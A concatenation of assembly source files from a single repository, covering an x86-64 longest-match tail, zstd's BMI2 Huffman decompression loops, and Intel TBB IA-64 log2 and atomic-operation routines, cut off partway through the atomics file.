movdqu 16(%prev, %rdx), %xmm4
pcmpeqb %xmm4, %xmm3
movdqu 32(%windowbestlen, %rdx), %xmm5
movdqu 32(%prev, %rdx), %xmm6
pcmpeqb %xmm6, %xmm5
movdqu 48(%windowbestlen, %rdx), %xmm7
movdqu 48(%prev, %rdx), %xmm8
pcmpeqb %xmm8, %xmm7
/* Check the comparisons' results */
pmovmskb %xmm1, %rax
notw %ax
bsfw %ax, %ax
jnz LeaveLoopCmps
/* this is the only iteration of the loop with a possibility of having
incremented rdx by 0x108 (each loop iteration add 16*4 = 0x40
and (0x40*4)+8=0x108 */
add $8, %rdx
jz LenMaximum
add $8, %rdx
pmovmskb %xmm3, %rax
notw %ax
bsfw %ax, %ax
jnz LeaveLoopCmps
add $16, %rdx
pmovmskb %xmm5, %rax
notw %ax
bsfw %ax, %ax
jnz LeaveLoopCmps
add $16, %rdx
pmovmskb %xmm7, %rax
notw %ax
bsfw %ax, %ax
jnz LeaveLoopCmps
add $16, %rdx
jmp LoopCmps
LeaveLoopCmps: add %rax, %rdx
#else
mov (%windowbestlen, %rdx), %rax
xor (%prev, %rdx), %rax
jnz LeaveLoopCmps
mov 8(%windowbestlen, %rdx), %rax
xor 8(%prev, %rdx), %rax
jnz LeaveLoopCmps8
mov 16(%windowbestlen, %rdx), %rax
xor 16(%prev, %rdx), %rax
jnz LeaveLoopCmps16
add $24, %rdx
jnz LoopCmps
jmp LenMaximum
# if 0
/*
 * This three-liner is tantalizingly simple, but bsf is a slow instruction,
 * and the complicated alternative down below is quite a bit faster. Sad...
 */
LeaveLoopCmps: bsf %rax, %rax /* find the first non-zero bit */
shrl $3, %eax /* divide by 8 to get the byte */
add %rax, %rdx
# else
LeaveLoopCmps16:
add $8, %rdx
LeaveLoopCmps8:
add $8, %rdx
LeaveLoopCmps: testl $0xFFFFFFFF, %eax /* Check the first 4 bytes */
jnz Check16
add $4, %rdx
shr $32, %rax
Check16: testw $0xFFFF, %ax
jnz LenLower
add $2, %rdx
shrl $16, %eax
LenLower: subb $1, %al
adc $0, %rdx
# endif
#endif
/* Calculate the length of the match. If it is longer than MAX_MATCH, */
/* then automatically accept it as the best possible match and leave. */
lea (%prev, %rdx), %rax
sub %scan, %rax
cmpl $MAX_MATCH, %eax
jge LenMaximum
/* If the length of the match is not longer than the best match we */
/* have so far, then forget it and return to the lookup loop. */
cmpl %bestlend, %eax
jg LongerMatch
mov _windowbestlen, %windowbestlen
mov dsPrev, %prev
movl _chainlenwmask, %edx
jmp LookupLoop
/* s->match_start = cur_match; */
/* best_len = len; */
/* if (len >= nice_match) break; */
/* scan_end = *(ushf*)(scan+best_len-1); */
LongerMatch:
movl %eax, %bestlend
movl %curmatchd, dsMatchStart
cmpl %nicematch, %eax
jge LeaveNow
lea (%window, %bestlen), %windowbestlen
mov %windowbestlen, _windowbestlen
movzwl -1(%scan, %rax), %scanend
mov dsPrev, %prev
movl _chainlenwmask, %chainlenwmask
jmp LookupLoop
/* Accept the current string, with the maximum possible length. */
LenMaximum:
movl $MAX_MATCH, %bestlend
movl %curmatchd, dsMatchStart
/* if ((uInt)best_len <= s->lookahead) return (uInt)best_len; */
/* return s->lookahead; */
LeaveNow:
movl dsLookahead, %eax
cmpl %eax, %bestlend
cmovngl %bestlend, %eax
LookaheadRet:
/* Restore the registers and return from whence we came. */
mov save_rsi, %rsi
mov save_rbx, %rbx
mov save_r12, %r12
mov save_r13, %r13
mov save_r14, %r14
mov save_r15, %r15
ret
match_init: ret
|
aiekick/Lumo
| 14,207
|
3rdparty/tracy/zstd/decompress/huf_decompress_amd64.S
|
/*
* Copyright (c) Meta Platforms, Inc. and affiliates.
* All rights reserved.
*
* This source code is licensed under both the BSD-style license (found in the
* LICENSE file in the root directory of this source tree) and the GPLv2 (found
* in the COPYING file in the root directory of this source tree).
* You may select, at your option, one of the above-listed licenses.
*/
#include "../common/portability_macros.h"
/* Stack marking
 * ref: https://wiki.gentoo.org/wiki/Hardened/GNU_stack_quickstart
 */
#if defined(__ELF__) && defined(__GNUC__)
.section .note.GNU-stack,"",%progbits
#endif
/* x86-64 BMI2 fast loops for 4-stream Huffman decoding; the matching
 * #endif is at the end of the file. */
#if ZSTD_ENABLE_ASM_X86_64_BMI2
/* Calling convention:
 *
 * %rdi contains the first argument: HUF_DecompressAsmArgs*.
 * %rbp isn't maintained (no frame pointer).
 * %rsp contains the stack pointer that grows down.
 * No red-zone is assumed, only addresses >= %rsp are used.
 * All register contents are preserved.
 *
 * TODO: Support Windows calling convention.
 */
ZSTD_HIDE_ASM_FUNCTION(HUF_decompress4X1_usingDTable_internal_fast_asm_loop)
ZSTD_HIDE_ASM_FUNCTION(HUF_decompress4X2_usingDTable_internal_fast_asm_loop)
ZSTD_HIDE_ASM_FUNCTION(_HUF_decompress4X2_usingDTable_internal_fast_asm_loop)
ZSTD_HIDE_ASM_FUNCTION(_HUF_decompress4X1_usingDTable_internal_fast_asm_loop)
.global HUF_decompress4X1_usingDTable_internal_fast_asm_loop
.global HUF_decompress4X2_usingDTable_internal_fast_asm_loop
.global _HUF_decompress4X1_usingDTable_internal_fast_asm_loop
.global _HUF_decompress4X2_usingDTable_internal_fast_asm_loop
.text
/* Sets up register mappings for clarity.
 * op[], bits[], dtable & ip[0] each get their own register.
 * ip[1,2,3] & olimit alias var[].
 * %rax is a scratch register.
 */
#define op0 rsi
#define op1 rbx
#define op2 rcx
#define op3 rdi
#define ip0 r8
#define ip1 r9
#define ip2 r10
#define ip3 r11
#define bits0 rbp
#define bits1 rdx
#define bits2 r12
#define bits3 r13
#define dtable r14
#define olimit r15
/* var[] aliases ip[1,2,3] & olimit
 * ip[1,2,3] are saved every iteration.
 * olimit is only used in compute_olimit.
 */
#define var0 r15
#define var1 r9
#define var2 r10
#define var3 r11
/* 32-bit var registers */
#define vard0 r15d
#define vard1 r9d
#define vard2 r10d
#define vard3 r11d
/* Calls X(N) for each stream 0, 1, 2, 3. */
#define FOR_EACH_STREAM(X) \
X(0); \
X(1); \
X(2); \
X(3)
/* Calls X(N, idx) for each stream 0, 1, 2, 3. */
#define FOR_EACH_STREAM_WITH_INDEX(X, idx) \
X(0, idx); \
X(1, idx); \
X(2, idx); \
X(3, idx)
/* Define both _HUF_* & HUF_* symbols because MacOS
 * C symbols are prefixed with '_' & Linux symbols aren't.
 */
_HUF_decompress4X1_usingDTable_internal_fast_asm_loop:
HUF_decompress4X1_usingDTable_internal_fast_asm_loop:
ZSTD_CET_ENDBRANCH
/*
 * Fast loop for the single-symbol (X1) table: decodes 4 Huffman streams,
 * 5 one-byte symbols per stream per iteration (20 total).
 * In: %rdi = HUF_DecompressAsmArgs*.  On exit, ip/op/bits state is
 * written back through the args struct; all registers are restored.
 */
/* Save all registers - even if they are callee saved for simplicity. */
push %rax
push %rbx
push %rcx
push %rdx
push %rbp
push %rsi
push %rdi
push %r8
push %r9
push %r10
push %r11
push %r12
push %r13
push %r14
push %r15
/* Read HUF_DecompressAsmArgs* args from %rax */
movq %rdi, %rax
movq 0(%rax), %ip0
movq 8(%rax), %ip1
movq 16(%rax), %ip2
movq 24(%rax), %ip3
movq 32(%rax), %op0
movq 40(%rax), %op1
movq 48(%rax), %op2
movq 56(%rax), %op3
movq 64(%rax), %bits0
movq 72(%rax), %bits1
movq 80(%rax), %bits2
movq 88(%rax), %bits3
movq 96(%rax), %dtable
push %rax /* argument */
push 104(%rax) /* ilimit */
push 112(%rax) /* oend */
push %olimit /* olimit space */
subq $24, %rsp
/* Stack layout from here: 0/8/16(%rsp) = ip1/ip2/ip3 scratch,
 * 24 = olimit, 32 = oend, 40 = ilimit, 48 = args pointer. */
.L_4X1_compute_olimit:
/* Computes how many iterations we can do safely
 * %r15, %rax may be clobbered
 * rbx, rdx must be saved
 * op3 & ip0 mustn't be clobbered
 */
movq %rbx, 0(%rsp)
movq %rdx, 8(%rsp)
movq 32(%rsp), %rax /* rax = oend */
subq %op3, %rax /* rax = oend - op3 */
/* r15 = (oend - op3) / 5 */
/* 0xCCCCCCCCCCCCCCCD: fixed-point reciprocal; mulq high half >> 2 == /5 */
movabsq $-3689348814741910323, %rdx
mulq %rdx
movq %rdx, %r15
shrq $2, %r15
movq %ip0, %rax /* rax = ip0 */
movq 40(%rsp), %rdx /* rdx = ilimit */
subq %rdx, %rax /* rax = ip0 - ilimit */
movq %rax, %rbx /* rbx = ip0 - ilimit */
/* rdx = (ip0 - ilimit) / 7 */
/* 0x2492492492492493: reciprocal for /7, with the add/shift fixup below */
movabsq $2635249153387078803, %rdx
mulq %rdx
subq %rdx, %rbx
shrq %rbx
addq %rbx, %rdx
shrq $2, %rdx
/* r15 = min(%rdx, %r15) */
cmpq %rdx, %r15
cmova %rdx, %r15
/* r15 = r15 * 5 */
leaq (%r15, %r15, 4), %r15
/* olimit = op3 + r15 */
addq %op3, %olimit
movq 8(%rsp), %rdx
movq 0(%rsp), %rbx
/* If (op3 + 20 > olimit) */
movq %op3, %rax /* rax = op3 */
addq $20, %rax /* rax = op3 + 20 */
cmpq %rax, %olimit /* op3 + 20 > olimit */
jb .L_4X1_exit
/* If (ip1 < ip0) go to exit */
cmpq %ip0, %ip1
jb .L_4X1_exit
/* If (ip2 < ip1) go to exit */
cmpq %ip1, %ip2
jb .L_4X1_exit
/* If (ip3 < ip2) go to exit */
cmpq %ip2, %ip3
jb .L_4X1_exit
/* Reads top 11 bits from bits[n]
 * Loads dt[bits[n]] into var[n]
 */
#define GET_NEXT_DELT(n) \
movq $53, %var##n; \
shrxq %var##n, %bits##n, %var##n; \
movzwl (%dtable,%var##n,2),%vard##n
/* var[n] must contain the DTable entry computed with GET_NEXT_DELT
 * Moves var[n] to %rax
 * bits[n] <<= var[n] & 63
 * op[n][idx] = %rax >> 8
 * %ah is a way to access bits [8, 16) of %rax
 */
#define DECODE_FROM_DELT(n, idx) \
movq %var##n, %rax; \
shlxq %var##n, %bits##n, %bits##n; \
movb %ah, idx(%op##n)
/* Assumes GET_NEXT_DELT has been called.
 * Calls DECODE_FROM_DELT then GET_NEXT_DELT
 */
#define DECODE_AND_GET_NEXT(n, idx) \
DECODE_FROM_DELT(n, idx); \
GET_NEXT_DELT(n) \
/* // ctz & nbBytes is stored in bits[n]
 * // nbBits is stored in %rax
 * ctz = CTZ[bits[n]]
 * nbBits = ctz & 7
 * nbBytes = ctz >> 3
 * op[n] += 5
 * ip[n] -= nbBytes
 * // Note: x86-64 is little-endian ==> no bswap
 * bits[n] = MEM_readST(ip[n]) | 1
 * bits[n] <<= nbBits
 */
#define RELOAD_BITS(n) \
bsfq %bits##n, %bits##n; \
movq %bits##n, %rax; \
andq $7, %rax; \
shrq $3, %bits##n; \
leaq 5(%op##n), %op##n; \
subq %bits##n, %ip##n; \
movq (%ip##n), %bits##n; \
orq $1, %bits##n; \
shlx %rax, %bits##n, %bits##n
/* Store clobbered variables on the stack */
movq %olimit, 24(%rsp)
movq %ip1, 0(%rsp)
movq %ip2, 8(%rsp)
movq %ip3, 16(%rsp)
/* Call GET_NEXT_DELT for each stream */
FOR_EACH_STREAM(GET_NEXT_DELT)
.p2align 6
.L_4X1_loop_body:
/* Decode 5 symbols in each of the 4 streams (20 total)
 * Must have called GET_NEXT_DELT for each stream
 */
FOR_EACH_STREAM_WITH_INDEX(DECODE_AND_GET_NEXT, 0)
FOR_EACH_STREAM_WITH_INDEX(DECODE_AND_GET_NEXT, 1)
FOR_EACH_STREAM_WITH_INDEX(DECODE_AND_GET_NEXT, 2)
FOR_EACH_STREAM_WITH_INDEX(DECODE_AND_GET_NEXT, 3)
FOR_EACH_STREAM_WITH_INDEX(DECODE_FROM_DELT, 4)
/* Load ip[1,2,3] from stack (var[] aliases them)
 * ip[] is needed for RELOAD_BITS
 * Each will be stored back to the stack after RELOAD
 */
movq 0(%rsp), %ip1
movq 8(%rsp), %ip2
movq 16(%rsp), %ip3
/* Reload each stream & fetch the next table entry
 * to prepare for the next iteration
 */
RELOAD_BITS(0)
GET_NEXT_DELT(0)
RELOAD_BITS(1)
movq %ip1, 0(%rsp)
GET_NEXT_DELT(1)
RELOAD_BITS(2)
movq %ip2, 8(%rsp)
GET_NEXT_DELT(2)
RELOAD_BITS(3)
movq %ip3, 16(%rsp)
GET_NEXT_DELT(3)
/* If op3 < olimit: continue the loop */
cmp %op3, 24(%rsp)
ja .L_4X1_loop_body
/* Reload ip[1,2,3] from stack */
movq 0(%rsp), %ip1
movq 8(%rsp), %ip2
movq 16(%rsp), %ip3
/* Re-compute olimit */
jmp .L_4X1_compute_olimit
/* Fix: undef the macro actually defined above (DECODE_AND_GET_NEXT);
 * the previous "#undef DECODE" named a macro never defined here. */
#undef GET_NEXT_DELT
#undef DECODE_FROM_DELT
#undef DECODE_AND_GET_NEXT
#undef RELOAD_BITS
.L_4X1_exit:
addq $24, %rsp
/* Restore stack (oend & olimit) */
pop %rax /* olimit */
pop %rax /* oend */
pop %rax /* ilimit */
pop %rax /* arg */
/* Save ip / op / bits */
movq %ip0, 0(%rax)
movq %ip1, 8(%rax)
movq %ip2, 16(%rax)
movq %ip3, 24(%rax)
movq %op0, 32(%rax)
movq %op1, 40(%rax)
movq %op2, 48(%rax)
movq %op3, 56(%rax)
movq %bits0, 64(%rax)
movq %bits1, 72(%rax)
movq %bits2, 80(%rax)
movq %bits3, 88(%rax)
/* Restore registers */
pop %r15
pop %r14
pop %r13
pop %r12
pop %r11
pop %r10
pop %r9
pop %r8
pop %rdi
pop %rsi
pop %rbp
pop %rdx
pop %rcx
pop %rbx
pop %rax
ret
_HUF_decompress4X2_usingDTable_internal_fast_asm_loop:
HUF_decompress4X2_usingDTable_internal_fast_asm_loop:
ZSTD_CET_ENDBRANCH
/*
 * Fast loop for the double-symbol (X2) table: each DTable entry is 4
 * bytes (16-bit symbol pair, nbBits byte, length byte); DECODE stores a
 * 2-byte word and advances op[n] by the entry's length byte.
 * In: %rdi = HUF_DecompressAsmArgs*; state written back on exit.
 */
/* Save all registers - even if they are callee saved for simplicity. */
push %rax
push %rbx
push %rcx
push %rdx
push %rbp
push %rsi
push %rdi
push %r8
push %r9
push %r10
push %r11
push %r12
push %r13
push %r14
push %r15
movq %rdi, %rax
movq 0(%rax), %ip0
movq 8(%rax), %ip1
movq 16(%rax), %ip2
movq 24(%rax), %ip3
movq 32(%rax), %op0
movq 40(%rax), %op1
movq 48(%rax), %op2
movq 56(%rax), %op3
movq 64(%rax), %bits0
movq 72(%rax), %bits1
movq 80(%rax), %bits2
movq 88(%rax), %bits3
movq 96(%rax), %dtable
push %rax /* argument */
push %rax /* olimit */
push 104(%rax) /* ilimit */
movq 112(%rax), %rax
push %rax /* oend3 */
movq %op3, %rax
push %rax /* oend2 */
movq %op2, %rax
push %rax /* oend1 */
movq %op1, %rax
push %rax /* oend0 */
/* Scratch space */
subq $8, %rsp
/* Stack layout from here: 0(%rsp) = scratch, 8/16/24/32 = oend0..3,
 * 40 = ilimit, 48 = olimit, 56 = args pointer. */
.L_4X2_compute_olimit:
/* Computes how many iterations we can do safely
 * %r15, %rax may be clobbered
 * rdx must be saved
 * op[1,2,3,4] & ip0 mustn't be clobbered
 */
movq %rdx, 0(%rsp)
/* We can consume up to 7 input bytes each iteration. */
movq %ip0, %rax /* rax = ip0 */
movq 40(%rsp), %rdx /* rdx = ilimit */
subq %rdx, %rax /* rax = ip0 - ilimit */
movq %rax, %r15 /* r15 = ip0 - ilimit */
/* rdx = rax / 7 */
/* 0x2492492492492493: reciprocal for /7, with the add/shift fixup below */
movabsq $2635249153387078803, %rdx
mulq %rdx
subq %rdx, %r15
shrq %r15
addq %r15, %rdx
shrq $2, %rdx
/* r15 = (ip0 - ilimit) / 7 */
movq %rdx, %r15
/* r15 = min(r15, min(oend0 - op0, oend1 - op1, oend2 - op2, oend3 - op3) / 10) */
movq 8(%rsp), %rax /* rax = oend0 */
subq %op0, %rax /* rax = oend0 - op0 */
movq 16(%rsp), %rdx /* rdx = oend1 */
subq %op1, %rdx /* rdx = oend1 - op1 */
cmpq %rax, %rdx
cmova %rax, %rdx /* rdx = min(%rdx, %rax) */
movq 24(%rsp), %rax /* rax = oend2 */
subq %op2, %rax /* rax = oend2 - op2 */
cmpq %rax, %rdx
cmova %rax, %rdx /* rdx = min(%rdx, %rax) */
movq 32(%rsp), %rax /* rax = oend3 */
subq %op3, %rax /* rax = oend3 - op3 */
cmpq %rax, %rdx
cmova %rax, %rdx /* rdx = min(%rdx, %rax) */
/* 0xCCCCCCCCCCCCCCCD: reciprocal of 5; combined with shrq $3 == /10 */
movabsq $-3689348814741910323, %rax
mulq %rdx
shrq $3, %rdx /* rdx = rdx / 10 */
/* r15 = min(%rdx, %r15) */
cmpq %rdx, %r15
cmova %rdx, %r15
/* olimit = op3 + 5 * r15 */
movq %r15, %rax
leaq (%op3, %rax, 4), %olimit
addq %rax, %olimit
movq 0(%rsp), %rdx
/* If (op3 + 10 > olimit) */
movq %op3, %rax /* rax = op3 */
addq $10, %rax /* rax = op3 + 10 */
cmpq %rax, %olimit /* op3 + 10 > olimit */
jb .L_4X2_exit
/* If (ip1 < ip0) go to exit */
cmpq %ip0, %ip1
jb .L_4X2_exit
/* If (ip2 < ip1) go to exit */
cmpq %ip1, %ip2
jb .L_4X2_exit
/* If (ip3 < ip2) go to exit */
cmpq %ip2, %ip3
jb .L_4X2_exit
/* Decode one entry for stream n: index = top 11 bits of bits[n];
 * store the 2-byte symbol pair, shift out nbBits, advance op by length. */
#define DECODE(n, idx) \
movq %bits##n, %rax; \
shrq $53, %rax; \
movzwl 0(%dtable,%rax,4),%r8d; \
movzbl 2(%dtable,%rax,4),%r15d; \
movzbl 3(%dtable,%rax,4),%eax; \
movw %r8w, (%op##n); \
shlxq %r15, %bits##n, %bits##n; \
addq %rax, %op##n
#define RELOAD_BITS(n) \
bsfq %bits##n, %bits##n; \
movq %bits##n, %rax; \
shrq $3, %bits##n; \
andq $7, %rax; \
subq %bits##n, %ip##n; \
movq (%ip##n), %bits##n; \
orq $1, %bits##n; \
shlxq %rax, %bits##n, %bits##n
movq %olimit, 48(%rsp)
.p2align 6
.L_4X2_loop_body:
/* We clobber r8, so store it on the stack */
movq %r8, 0(%rsp)
/* Decode 5 symbols from each of the 4 streams (20 symbols total). */
FOR_EACH_STREAM_WITH_INDEX(DECODE, 0)
FOR_EACH_STREAM_WITH_INDEX(DECODE, 1)
FOR_EACH_STREAM_WITH_INDEX(DECODE, 2)
FOR_EACH_STREAM_WITH_INDEX(DECODE, 3)
FOR_EACH_STREAM_WITH_INDEX(DECODE, 4)
/* Reload r8 */
movq 0(%rsp), %r8
FOR_EACH_STREAM(RELOAD_BITS)
cmp %op3, 48(%rsp)
ja .L_4X2_loop_body
jmp .L_4X2_compute_olimit
#undef DECODE
#undef RELOAD_BITS
.L_4X2_exit:
addq $8, %rsp
/* Restore stack (oend & olimit) */
pop %rax /* oend0 */
pop %rax /* oend1 */
pop %rax /* oend2 */
pop %rax /* oend3 */
pop %rax /* ilimit */
pop %rax /* olimit */
pop %rax /* arg */
/* Save ip / op / bits */
movq %ip0, 0(%rax)
movq %ip1, 8(%rax)
movq %ip2, 16(%rax)
movq %ip3, 24(%rax)
movq %op0, 32(%rax)
movq %op1, 40(%rax)
movq %op2, 48(%rax)
movq %op3, 56(%rax)
movq %bits0, 64(%rax)
movq %bits1, 72(%rax)
movq %bits2, 80(%rax)
movq %bits3, 88(%rax)
/* Restore registers */
pop %r15
pop %r14
pop %r13
pop %r12
pop %r11
pop %r10
pop %r9
pop %r8
pop %rdi
pop %rsi
pop %rbp
pop %rdx
pop %rcx
pop %rbx
pop %rax
ret
#endif /* ZSTD_ENABLE_ASM_X86_64_BMI2 */
|
aiekick/Lumo
| 1,304
|
3rdparty/taskflow/3rd-party/tbb/src/tbb/ia64-gas/log2.s
|
// Copyright (c) 2005-2020 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
.section .text
.align 16
// unsigned long __TBB_machine_lg( unsigned long x );
// r32 = x
// Computes floor(log2(x)) for x > 0: OR-smears the highest set bit into
// every lower bit position, then popcnt-1 yields that bit's index (r8).
.proc __TBB_machine_lg#
.global __TBB_machine_lg#
__TBB_machine_lg:
shr r16=r32,1 // .x
;;
shr r17=r32,2 // ..x
or r32=r32,r16 // xx
;;
shr r16=r32,3 // ...xx
or r32=r32,r17 // xxx
;;
shr r17=r32,5 // .....xxx
or r32=r32,r16 // xxxxx
;;
shr r16=r32,8 // ........xxxxx
or r32=r32,r17 // xxxxxxxx
;;
shr r17=r32,13
or r32=r32,r16 // 13x
;;
shr r16=r32,21
or r32=r32,r17 // 21x
;;
shr r17=r32,34
or r32=r32,r16 // 34x
;;
shr r16=r32,55
or r32=r32,r17 // 55x
;;
or r32=r32,r16 // 64x
;;
popcnt r8=r32
;;
add r8=-1,r8
br.ret.sptk.many b0
.endp __TBB_machine_lg#
|
aiekick/Lumo
| 15,124
|
3rdparty/taskflow/3rd-party/tbb/src/tbb/ia64-gas/atomic_support.s
|
// Copyright (c) 2005-2020 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
// 1-byte atomics. The __TBB_full_fence entry issues mf (full memory
// fence) then branches to the acquire variant; acquire variants use the
// .acq instruction forms. In: r32 = address, r33 = addend/new value
// (r34 = comparand for cmpswp). Out: r8 = previous value.
.section .text
.align 16
.proc __TBB_machine_fetchadd1__TBB_full_fence#
.global __TBB_machine_fetchadd1__TBB_full_fence#
__TBB_machine_fetchadd1__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd1acquire
}
.endp __TBB_machine_fetchadd1__TBB_full_fence#
// CAS retry loop: re-reads the cell until cmpxchg succeeds.
.proc __TBB_machine_fetchadd1acquire#
.global __TBB_machine_fetchadd1acquire#
__TBB_machine_fetchadd1acquire:
ld1 r9=[r32]
;;
Retry_1acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg1.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_1acquire
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd1acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore1__TBB_full_fence#
.global __TBB_machine_fetchstore1__TBB_full_fence#
__TBB_machine_fetchstore1__TBB_full_fence:
mf
;;
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1__TBB_full_fence#
.proc __TBB_machine_fetchstore1acquire#
.global __TBB_machine_fetchstore1acquire#
__TBB_machine_fetchstore1acquire:
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp1__TBB_full_fence#
.global __TBB_machine_cmpswp1__TBB_full_fence#
__TBB_machine_cmpswp1__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp1acquire
}
.endp __TBB_machine_cmpswp1__TBB_full_fence#
// zxt1: comparand must be zero-extended to match the 1-byte load width.
.proc __TBB_machine_cmpswp1acquire#
.global __TBB_machine_cmpswp1acquire#
__TBB_machine_cmpswp1acquire:
zxt1 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg1.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp1acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
// 2-byte atomics; same structure as the 1-byte group above
// (full-fence entry = mf + branch to the acquire variant).
.section .text
.align 16
.proc __TBB_machine_fetchadd2__TBB_full_fence#
.global __TBB_machine_fetchadd2__TBB_full_fence#
__TBB_machine_fetchadd2__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd2acquire
}
.endp __TBB_machine_fetchadd2__TBB_full_fence#
.proc __TBB_machine_fetchadd2acquire#
.global __TBB_machine_fetchadd2acquire#
__TBB_machine_fetchadd2acquire:
ld2 r9=[r32]
;;
Retry_2acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg2.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_2acquire
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd2acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore2__TBB_full_fence#
.global __TBB_machine_fetchstore2__TBB_full_fence#
__TBB_machine_fetchstore2__TBB_full_fence:
mf
;;
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2__TBB_full_fence#
.proc __TBB_machine_fetchstore2acquire#
.global __TBB_machine_fetchstore2acquire#
__TBB_machine_fetchstore2acquire:
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp2__TBB_full_fence#
.global __TBB_machine_cmpswp2__TBB_full_fence#
__TBB_machine_cmpswp2__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp2acquire
}
.endp __TBB_machine_cmpswp2__TBB_full_fence#
.proc __TBB_machine_cmpswp2acquire#
.global __TBB_machine_cmpswp2acquire#
__TBB_machine_cmpswp2acquire:
zxt2 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg2.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp2acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
// 4-byte atomics. fetchadd4 special-cases addend +1/-1 to use the
// hardware fetchadd4.acq instruction instead of the CAS retry loop.
.section .text
.align 16
.proc __TBB_machine_fetchadd4__TBB_full_fence#
.global __TBB_machine_fetchadd4__TBB_full_fence#
__TBB_machine_fetchadd4__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd4acquire
}
.endp __TBB_machine_fetchadd4__TBB_full_fence#
.proc __TBB_machine_fetchadd4acquire#
.global __TBB_machine_fetchadd4acquire#
__TBB_machine_fetchadd4acquire:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_4acquire
(p8) br.cond.dpnt Dec_4acquire
;;
ld4 r9=[r32]
;;
Retry_4acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg4.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_4acquire
br.ret.sptk.many b0
Inc_4acquire:
fetchadd4.acq r8=[r32],1
br.ret.sptk.many b0
Dec_4acquire:
fetchadd4.acq r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd4acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore4__TBB_full_fence#
.global __TBB_machine_fetchstore4__TBB_full_fence#
__TBB_machine_fetchstore4__TBB_full_fence:
mf
;;
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4__TBB_full_fence#
.proc __TBB_machine_fetchstore4acquire#
.global __TBB_machine_fetchstore4acquire#
__TBB_machine_fetchstore4acquire:
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp4__TBB_full_fence#
.global __TBB_machine_cmpswp4__TBB_full_fence#
__TBB_machine_cmpswp4__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp4acquire
}
.endp __TBB_machine_cmpswp4__TBB_full_fence#
.proc __TBB_machine_cmpswp4acquire#
.global __TBB_machine_cmpswp4acquire#
__TBB_machine_cmpswp4acquire:
zxt4 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg4.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp4acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
// 8-byte atomics. Full register width, so cmpswp needs no zero-extend
// of the comparand (unlike the 1/2/4-byte variants above).
.section .text
.align 16
.proc __TBB_machine_fetchadd8__TBB_full_fence#
.global __TBB_machine_fetchadd8__TBB_full_fence#
__TBB_machine_fetchadd8__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd8acquire
}
.endp __TBB_machine_fetchadd8__TBB_full_fence#
.proc __TBB_machine_fetchadd8acquire#
.global __TBB_machine_fetchadd8acquire#
__TBB_machine_fetchadd8acquire:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
